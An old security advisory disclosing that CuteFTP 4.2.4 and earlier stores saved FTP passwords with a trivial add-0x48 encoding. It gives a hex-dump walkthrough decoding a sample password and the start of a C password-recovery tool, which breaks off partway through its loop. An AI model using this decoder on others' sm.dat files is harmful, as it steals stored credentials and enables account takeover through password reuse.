============================================================================ Securax-SA-21 Security Advisory belgian.networking.security Dutch ============================================================================ Topic: CuteFTP uses a weak password encoding scheme Announced: 2001-08-01 Affects: CuteFTP 4.2.4 and below. (but not to low) ============================================================================ Note: If you happen to find more information, solutions, ... about the below problem or further varients please contact me on the following email incubus@securax.org, or you can contact the Securax crew by e-mail at info@securax.org. I. Problem Description ----------------------- Globalscape's CuteFTP is a popular FTP client. It is used to connect to remote ftp servers. CuteFTP has a kinda "Address book" which stores info on several FTP servers, such as hostname, login & password (basically the stuff you need to log in.. :)). In any case, CuteFTP uses a very weak encryption scheme, it adds 72 (hex 48) to the plaintext password. So , Globalscape uses a kinda ROT-72 encryption scheme Let's get down and dirty, technical that is.. How are the passwords stored? Well, they are stored in a file called "sm.dat". I'll give you an example: This is a part of the hex dump of my sm.dat: 08 31 30 2E 30 2E 30 2E 33 05 41 64 6D 6D 69 05 BC AD BB BB A9 ^ ^ ^ | - hostname (10.0.0.3) - | - login - | - encoded pw - | | | |___ len(hostname) |__ len(login) |__ len(password) The password is BC AD BB BB A9, but if you substract each character by 48, you'll see: 74 65 73 73 61, which is "tessa". So you probably can see, there is a user "Admin" , with a password ("tessa") on box 10.0.0.3. Cute(ftp) isn't it? II. Impact ---------- No, you won't be able to r3wt th3 pl4n3t with this, But it gave me access to several other accounts, because ftp and shell passwords are often the same. But instead of letting you calculate the password.. here's the code: --| BOF: cuteftpd.c |-- /* CuteFTPd: a CUTE Fucking Too easy Password Decrypter ---------------------------------------------------- This code was made on a hot and sunny afternoon, (as we got many of em in belgium). So, don't shoot me if some things won't work. I've found some problems when your login is 11 (0x0A) of 13 (0x0D) chars long... but what the hell.. fix it. This program is dedicated to Peter "DC" De Coninck, a good friend of mine who passed away in April. DC, I miss you, thank you for everything, take care man. All my love to Tessa, I love you forever, always, every day of my life, please marry me. I love you, i need you. please, be mine forever. Respect to all the great ppl at #securax@irc.hexyn.be: U know who i mean, and who i don't mean. grmBL. ;) To Reggie: happy birthday!! =) Take care, incubus ps: this code sucks, i know. */ #include #include #include #define banner "\n-] CuteFTP password retrieval tool\n -------------------------------\n\n" #define usage " usage: %s \n\n" int main(int argc, char **argv) { FILE *list; unsigned char c, p, t; unsigned char host[128], un[128], ep[128], dp[128]; int i = 0; printf (banner); if (argc < 2){ printf(usage,argv[0]); exit(1); } if ((list = fopen(argv[1],"rb")) == NULL){ perror("error opening file"); exit(1); } while (!feof(list)){ c = fgetc(list); if (c < 48){ i++; p = fgetc(list); if ((islower(p))||(isupper(p))||(isdigit(p))){ host[0] = p; for (i=1; i